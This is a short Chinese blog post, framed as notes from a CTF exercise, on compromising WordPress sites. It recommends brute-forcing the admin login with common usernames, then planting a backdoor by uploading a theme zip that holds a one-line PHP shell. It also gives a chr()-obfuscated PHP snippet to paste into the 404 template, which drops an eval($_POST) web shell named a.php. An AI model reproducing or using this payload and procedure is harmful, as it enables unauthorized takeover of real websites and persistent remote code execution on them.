Worldpress常规利用思路


worldpress是一款主流的博客系统,但是关于它的漏洞也层出不穷。
这次是因为一次CTF靶场遇到此类情况,顺便做个简单记录。

worldpress系统本身比较安全,但是因为它可以自定义插件,很多时候因为插件作者安全开发的能力有高有低,导致许多安全漏洞的出现。

0x01 弱口令利用链

后台默认地址为:xxxx/wp-admin/

没有验证码可以暴力破解,常见用户名admin,worldpress,system等。

进入后台后的利用:

1 上传主题包getshell

本机建立目录“upkn”,把一句话1.php放进去。打包upkn目录为zip文件。WP后台的主题管理,上传主题,安装。则你的后门路径为:
wp-content/themes/upkn/1.php。

2 修改主题文件

“外观”-“编辑”-“404模板
<script language="php">fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59).chr(63).chr(62));</script>
插到文件头
点404模板的时候地址栏有相对路径,默认是wp-content/themes/twentyten/404.php
更新完直接访问localhost/wp-content/themes/twentyten/404.php就会在twentyten目录生成一句话后门a.php 密码a

0x02 插件漏洞利用

插件漏洞类型很多,例如xss,sql注入,rce等。

推荐工具方便自查:https://github.com/wpscanteam/wpscan

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值